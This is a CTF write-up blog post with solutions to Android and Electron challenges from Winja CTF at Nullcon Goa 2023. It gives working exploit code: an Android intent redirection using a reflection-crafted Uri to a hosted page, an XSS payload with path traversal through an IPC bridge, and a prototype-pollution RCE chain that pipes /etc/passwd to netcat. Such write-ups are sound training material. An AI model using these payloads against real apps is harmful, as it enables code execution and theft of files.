Winja CTF Offical Writeup | Nullcon Goa 2023

Hi there!

This blog contains the write-up for 2 electron source code challenges and 1 android challenge that I created for Winja CTF for the Nullcon Goa event.

This is the vague write-up. I will update it soon.

Android Challenge

  1. Bypass the root detection and emulator check, if you are using any of these
  2. Host one HTML file with the below code
<html>

<body>
	
<script type="text/javascript">
app.makeToast();


</script>
</body>



</html>


  1. Now, Build one more application with the below code and replace the ngrok URL with the URL of the hosted HTML page. you will see flag in the toast and in the logs as well
 Uri uri;
        try {
            Class partClass = Class.forName("android.net.Uri$Part");
            Constructor partConstructor = partClass.getDeclaredConstructors()[0];
            partConstructor.setAccessible(true);

            Class pathPartClass = Class.forName("android.net.Uri$PathPart");
            Constructor pathPartConstructor = pathPartClass.getDeclaredConstructors()[0];
            pathPartConstructor.setAccessible(true);

            Class hierarchicalUriClass = Class.forName("android.net.Uri$HierarchicalUri");
            Constructor hierarchicalUriConstructor = hierarchicalUriClass.getDeclaredConstructors()[0];
            hierarchicalUriConstructor.setAccessible(true);

            Object authority = partConstructor.newInstance("winja.nullcon.net", "winja.nullcon.net");
            Object path = pathPartConstructor.newInstance("@e0e2-27-4-63-181.ngrok-free.app/flag.html", "@e0e2-27-4-63-181.ngrok-free.app/flag.html");
            uri = (Uri) hierarchicalUriConstructor.newInstance("https", authority, path, null, null);
        } catch (Exception e) {
            System.out.println("Exception occurred");
            e.printStackTrace();
            throw new RuntimeException(e);
        }

        Intent intent = new Intent();
        intent.setClassName("com.example.androidchall1","com.example.androidchall1.DeepLinkActivity");
        intent.setData(uri);

        Intent intent1 = new Intent();
        intent1.setClassName("com.example.androidchall1","com.example.androidchall1.HandleActivity");
        intent1.putExtra("activity",intent);

        startActivity(intent1);

Electron Application 1

  1. Using XSS, user has to call the exposed IPC module.
  2. Below is the payload for the same
 </script><script>top.window.api.receive('reply',(e=>{alert(`${e}`)})); top.window.api.sessionCheck('session','../../../../../../home/ctf/flag.txt');</script>

Electron Application 2

  1. Host the below HTML file

<html>

<body>

    <h1>Leak Internal module</h1>
<script>
    const originalCall =  Function.prototype.call

    Function.prototype.call = function(... args){ 
    
        console.log(args)
    if( args[3] && args[3].name === '__webpack_require__'){
    
      //console.log(args)
      window.__test= args[3]
      
      args[3]("module")._load("child_process").exec("cat /etc/passwd | nc localhost 4445")
    
    }
    return originalCall.apply(this,args) 
    
    }
    

</script>

</body>

</html>


  1. Use the below payload for gaining the RCE
keyword: __proto__[ALLOWED_ATTR][0]=onerror&__proto__[ALLOWED_ATTR][1]=src
append: <img src=1 onerror="document.location='<your html hosted file link>'">

Load Comments?